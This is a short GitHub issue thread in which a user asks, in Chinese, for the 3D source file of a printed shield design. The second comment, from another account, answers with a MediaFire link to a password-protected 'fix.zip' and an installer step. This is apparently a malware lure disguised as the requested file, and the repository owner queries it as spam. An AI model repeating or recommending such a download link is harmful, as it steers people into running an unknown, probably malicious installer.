### ISSUE TITLE
非常棒的设计

### ISSUE THREAD

**Issue by weekinro** [Finnitio/3dpcorne-shield-nodefree#1]

**Comment by weekinro** [comment]
你好，看到你这个设计，非常喜欢。请问能发我一份3D源文件吗。

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Finnitio** [comment]
spam?
